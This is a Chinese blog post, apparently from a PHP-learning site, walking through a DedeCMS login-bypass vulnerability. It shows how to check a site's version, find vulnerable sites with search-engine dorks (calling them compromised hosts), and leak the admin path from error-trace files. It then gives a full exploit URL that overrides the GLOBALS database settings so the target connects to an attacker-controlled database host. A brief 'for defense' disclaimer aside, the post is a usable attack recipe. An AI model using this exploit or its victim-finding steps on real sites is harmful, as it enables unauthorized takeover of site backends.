现在的位置: 首页 -> PHP学习 -> php学习之织梦dedecms漏洞讲解

php学习之织梦dedecms漏洞讲解

2013-07-28 10:56评论数 0 ⁄ 被浏览 29671 views+

织梦的一个漏洞,自己亲自试过,成功的秒进。不过绝对没有做坏事的,只是满足一下好奇心,再就是想练练手,进一步去加强我php学习,因为懂了才能防御嘛。用了织梦大半年,感觉织梦漏洞其实还是很多的,就算打了补丁,新版本的系统,很多高手还是可以攻破的。


而我呢,在这方面只是一只还没长好羽毛的菜鸟罢了^_^


先看看版本吧。

/data/admin/ver.txt  如:http://aa.com/data/admin/ver.txt

一般2011****或者最新的版本就没有这个漏洞了。


PS:其实这样搜一般可以找到很多肉鸡,例如百度输入“Powered by DedeCMSV55_GBK”可以找到大片低版本的织梦建设的网站。


然后试着得到后台地址,这个文件有时候有有时候没有,有的话,是有可能爆出后台路径的。

/data/mysql_error_trace.inc 或者 /data/mysqli_error_trace.inc


得到后台地址后,拼接上下面的这段代码,把“validate”换成当前的验证码,在就是要有一个自己的织梦站,把自己数据库的信息以下面链接中配置信息的形式补充完整,然后就可以移花接木的让目标网站访问你数据库的信息,自然就可以破解登进后台了。

/login.php?dopost=login&validate=dcug&userid=dede&pwd=admin&_POST[GLOBALS][cfg_dbhost]=33.123.123.123&_POST[GLOBALS][cfg_dbuser]=ddd&_POST[GLOBALS][cfg_dbpwd]=123&_POST[GLOBALS][cfg_dbname]=ddd&_POST[GLOBALS][cfg_dbprefix]=dede_


就说这么多,反正不是什么光彩的好事,看的懂就看,懂了的就防御,不要做什么坏事就得了;看不懂就一笑而过吧!呵呵...


本文只是一只小小菜鸟的一点见解,请高手勿喷。

 

文章出自:http://www.daixiaorui.com/read/14.html 本站所有文章,除注明出处外皆为原创,转载请注明本文地址,版权所有。

分享到:

目前有 0 条评论  @我要评论

    您的每一个评论都是对我的一份支持

     博客二维码

    昵称 *

    邮箱 *